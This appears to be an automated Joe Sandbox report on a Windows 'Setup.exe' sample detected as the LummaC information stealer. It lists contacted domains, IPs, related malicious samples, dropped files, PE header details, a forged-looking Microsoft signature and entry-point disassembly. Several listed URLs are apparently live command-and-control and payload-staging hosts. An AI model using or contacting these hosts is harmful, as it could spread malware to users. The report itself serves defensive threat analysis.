                                                                      https://beefshooti.click/apijSetup.exe, 00000000.00000003.1876780873.00000000038AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1874200327.00000000038AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://beefshooti.click/Setup.exe, 00000000.00000002.1998660474.000000000104B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903279526.000000000104B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1951085152.000000000105C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1905498616.000000000104D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoSetup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://klipcatepiu0.shop/hBSetup.exe, 00000000.00000002.1998660474.000000000104B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://neqi.shop/sdgjyut/psh.txtMSetup.exe, 00000000.00000002.1998349657.0000000001033000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://beefshooti.click/apih3=Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://ocsp.rootca1.amazontrust.com0:Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Setup.exe, 00000000.00000003.1825827041.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851951201.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1825717607.00000000038FF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851091316.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851360446.00000000038F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.ecosia.org/newtab/Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://ac.ecosia.org/autocomplete?q=Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://beefshooti.click/apiNSetup.exe, 00000000.00000003.1909177966.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1995816294.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1823947002.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://neqi.shop:443/sdgjyut/psh.txtSetup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    unknown
                                                                                                    https://klipcatepiu0.shop/int_clp_ldr_sha.txtSSetup.exe, 00000000.00000003.1996461951.000000000105E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    unknown
                                                                                                    https://support.microsofSetup.exe, 00000000.00000003.1825717607.0000000003901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://neqi.shop/sdgjyut/psh.txtf5Setup.exe, 00000000.00000003.1995816294.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://beefshooti.click/asseSetup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSetup.exe, 00000000.00000003.1825827041.00000000038D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://beefshooti.click:443/apimSetup.exe, 00000000.00000003.1909177966.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              104.21.18.185
                                                                                                              beefshooti.clickUnited States
                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                              104.21.27.229
                                                                                                              neqi.shopUnited States
                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1580125
                                                                                                              Start date and time:2024-12-24 01:11:12 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 5m 23s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:6
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:Setup.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@4/5@3/2
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 50%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 92%
                                                                                                              • Number of executed functions: 14
                                                                                                              • Number of non-executed functions: 128
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Stop behavior analysis, all processes terminated
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63, 52.149.20.212
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 3720 because it is empty
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              TimeTypeDescription
                                                                                                              19:12:16API Interceptor10x Sleep call for process: Setup.exe modified
                                                                                                              19:12:36API Interceptor16x Sleep call for process: powershell.exe modified
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              104.21.18.185Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                https://extrn.offer-21890.com/sign-in?op_token=DRZhttpskostikGet hashmaliciousUnknownBrowse
                                                                                                                  104.21.27.229Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    beefshooti.clickSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.18.185
                                                                                                                    neqi.shopSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.27.229
                                                                                                                    AutoUpdate.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.169.205
                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 194.58.112.174
                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 194.58.112.174
                                                                                                                    Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 194.58.112.174
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    CLOUDFLARENETUSinstaller.msiGet hashmaliciousUnknownBrowse
                                                                                                                    • 104.21.80.93
                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.58.45
                                                                                                                    AutoUpdate.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.169.205
                                                                                                                    EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 172.67.177.134
                                                                                                                    https://en.newsnowbangla.com/archives/69912Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                                    • 104.17.25.14
                                                                                                                    https://u48917305.ct.sendgrid.net/ls/click?upn=u001.ztQPJiWtq2gO8V-2Ftd7SxY9UCAq3VScTPSloeIw5UEMPd6e3nbPRvJ98moPTqmrdQ1eNbvwZHJ-2BEb4HrooVFNCTltmXW6SgRONKSmPzdFoWfDQT97cczFZ0vj7M2xBd2izDTi-2BL-2BoVqB8yVzV2GW7vOPvy3s9yVghrOS5vs-2BSnWyzJMkXQxVEReq4oLCDet7QAOvo_JkpSD-2Bg6VoLAQppUKMb-2BxDh4v4nbOeQFT31aoN-2FLkhvFCzY6wdlGM7RTNIi47OKR1tTaghG8tTKssArDNPSXAfX9wO6nsZ2FHn-2FunyaOti-2FaII-2FnbKYDXJOImW-2Bs9f4tYnWj8rqO7L0kp4KNRHBDo0iHoL8DEOGc8GMtzqzsIqERel6-2FxJyY4DBnsnUTOc2I4HCPKA6lxcCEXMtxEA1-2FnQ-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 104.17.25.14
                                                                                                                    Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 172.67.177.134
                                                                                                                    PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    CLOUDFLARENETUSinstaller.msiGet hashmaliciousUnknownBrowse
                                                                                                                    • 104.21.80.93
                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.58.45
                                                                                                                    AutoUpdate.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.169.205
                                                                                                                    EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 172.67.177.134
                                                                                                                    https://en.newsnowbangla.com/archives/69912Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                                    • 104.17.25.14
                                                                                                                    https://u48917305.ct.sendgrid.net/ls/click?upn=u001.ztQPJiWtq2gO8V-2Ftd7SxY9UCAq3VScTPSloeIw5UEMPd6e3nbPRvJ98moPTqmrdQ1eNbvwZHJ-2BEb4HrooVFNCTltmXW6SgRONKSmPzdFoWfDQT97cczFZ0vj7M2xBd2izDTi-2BL-2BoVqB8yVzV2GW7vOPvy3s9yVghrOS5vs-2BSnWyzJMkXQxVEReq4oLCDet7QAOvo_JkpSD-2Bg6VoLAQppUKMb-2BxDh4v4nbOeQFT31aoN-2FLkhvFCzY6wdlGM7RTNIi47OKR1tTaghG8tTKssArDNPSXAfX9wO6nsZ2FHn-2FunyaOti-2FaII-2FnbKYDXJOImW-2Bs9f4tYnWj8rqO7L0kp4KNRHBDo0iHoL8DEOGc8GMtzqzsIqERel6-2FxJyY4DBnsnUTOc2I4HCPKA6lxcCEXMtxEA1-2FnQ-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 104.17.25.14
                                                                                                                    Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 172.67.177.134
                                                                                                                    PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.27.229
                                                                                                                    • 104.21.18.185
                                                                                                                    AutoUpdate.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.27.229
                                                                                                                    • 104.21.18.185
                                                                                                                    Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 104.21.27.229
                                                                                                                    • 104.21.18.185
                                                                                                                    xlSzrIs5h6.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                    • 104.21.27.229
                                                                                                                    • 104.21.18.185
                                                                                                                    ZysXVT72cl.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.27.229
                                                                                                                    • 104.21.18.185
                                                                                                                    NxqDwaYpbp.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.27.229
                                                                                                                    • 104.21.18.185
                                                                                                                    NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.27.229
                                                                                                                    • 104.21.18.185
                                                                                                                    2jx1O1t486.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                    • 104.21.27.229
                                                                                                                    • 104.21.18.185
                                                                                                                    fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                    • 104.21.27.229
                                                                                                                    • 104.21.18.185
                                                                                                                    OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.27.229
                                                                                                                    • 104.21.18.185
                                                                                                                    No context
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):64
                                                                                                                    Entropy (8bit):1.1510207563435464
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                                                                    MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                                                                    SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                                                                    SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                                                                    SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview:@...e.................................^..............@..........
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):0.6743212123134371
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                                    • Windows ActiveX control (116523/4) 1.14%
                                                                                                                    • Inno Setup installer (109748/4) 1.07%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    File name:Setup.exe
                                                                                                                    File size:76'122'589 bytes
                                                                                                                    MD5:79c238ebe5c951b14e9e4729ce73fcc9
                                                                                                                    SHA1:87b1590ebd335e94594e654d1c78ce08067d9d1f
                                                                                                                    SHA256:09c43883e99bf9db74a86431dec7827fa5e112afe0e7efe952f4f50be249c4a6
                                                                                                                    SHA512:3bfcdc13c61436d0e216919bf8d9b047946ecd5a7fd95ac2dfa148d18b83f4d571c7a5256ec2bfc490f2433a73da91f069b5f72e6324edd05325a2b64a036ef1
                                                                                                                    SSDEEP:98304:wJ9VM+LtVt3P/KuG2ONG9iqaRQM333CiRHTf:0VL/tnHGYiqCECHTf
                                                                                                                    TLSH:B4F77B06B344EC2BFAF69635253282CC442A696367254DF747A82B7C7E310F71936EC6
                                                                                                                    File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                    Icon Hash:0974e4c4e4e47441
                                                                                                                    Entrypoint:0x6adbf4
                                                                                                                    Entrypoint Section:.itext
                                                                                                                    Digitally signed:true
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x6690DABC [Fri Jul 12 07:26:52 2024 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:6
                                                                                                                    OS Version Minor:1
                                                                                                                    File Version Major:6
                                                                                                                    File Version Minor:1
                                                                                                                    Subsystem Version Major:6
                                                                                                                    Subsystem Version Minor:1
                                                                                                                    Import Hash:d6ea28a9f4da0730c2562f3beec87130
                                                                                                                    Signature Valid:false
                                                                                                                    Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                    Error Number:-2146869232
                                                                                                                    Not Before, Not After
                                                                                                                    • 15/12/2020 21:24:20 02/12/2021 21:24:20
                                                                                                                    Subject Chain
                                                                                                                    • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                    Version:3
                                                                                                                    Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
                                                                                                                    Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
                                                                                                                    Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
                                                                                                                    Serial:33000003DFFB6AE3F427ECB6A30000000003DF
                                                                                                                    Instruction
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    add esp, FFFFFFF0h
                                                                                                                    push ebx
                                                                                                                    push esi
                                                                                                                    push edi
                                                                                                                    mov eax, 006A1758h
                                                                                                                    call 00007FC6C859A222h
                                                                                                                    mov eax, dword ptr [006B7ADCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    mov eax, dword ptr [eax+00000190h]
                                                                                                                    push FFFFFFECh
                                                                                                                    push eax
                                                                                                                    call 00007FC6C859E855h
                                                                                                                    mov edx, dword ptr [006B7ADCh]
                                                                                                                    mov edx, dword ptr [edx]
                                                                                                                    mov edx, dword ptr [edx+00000190h]
                                                                                                                    and eax, FFFFFF7Fh
                                                                                                                    push eax
                                                                                                                    push FFFFFFECh
                                                                                                                    push edx
                                                                                                                    call 00007FC6C859E841h
                                                                                                                    xor eax, eax
                                                                                                                    push ebp
                                                                                                                    push 006ADC85h
                                                                                                                    push dword ptr fs:[eax]
                                                                                                                    mov dword ptr fs:[eax], esp
                                                                                                                    push 00000001h
                                                                                                                    call 00007FC6C859DB34h
                                                                                                                    call 00007FC6C882994Fh
                                                                                                                    mov eax, dword ptr [006A137Ch]
                                                                                                                    push eax
                                                                                                                    push 006A1414h
                                                                                                                    mov eax, dword ptr [006B7ADCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    call 00007FC6C8733D18h
                                                                                                                    mov eax, 0069C190h
                                                                                                                    mov edx, dword ptr [006B7944h]
                                                                                                                    mov dword ptr [edx], eax
                                                                                                                    call 00007FC6C8829996h
                                                                                                                    xor eax, eax
                                                                                                                    pop edx
                                                                                                                    pop ecx
                                                                                                                    pop ecx
                                                                                                                    mov dword ptr fs:[eax], edx
                                                                                                                    jmp 00007FC6C88360FBh
                                                                                                                    jmp 00007FC6C859202Bh
                                                                                                                    call 00007FC6C88296DAh
                                                                                                                    mov eax, 00000001h
                                                                                                                    call 00007FC6C8592B18h
                                                                                                                    call 00007FC6C859246Fh
                                                                                                                    mov eax, dword ptr [006B7ADCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    mov edx, 006ADE18h
                                                                                                                    call 00007FC6C87337E2h
                                                                                                                    push 00000005h
                                                                                                                    mov eax, dword ptr [006B7ADCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    mov eax, dword ptr [eax+00000190h]
                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x2c50000x6e.edata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2c00000x3a6a.idata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3050000x80600.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x489680d0x21d0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c80000x3cd3c.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x2c70000x18.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x2c09f80x8e0.idata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2c40000xe28.didata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
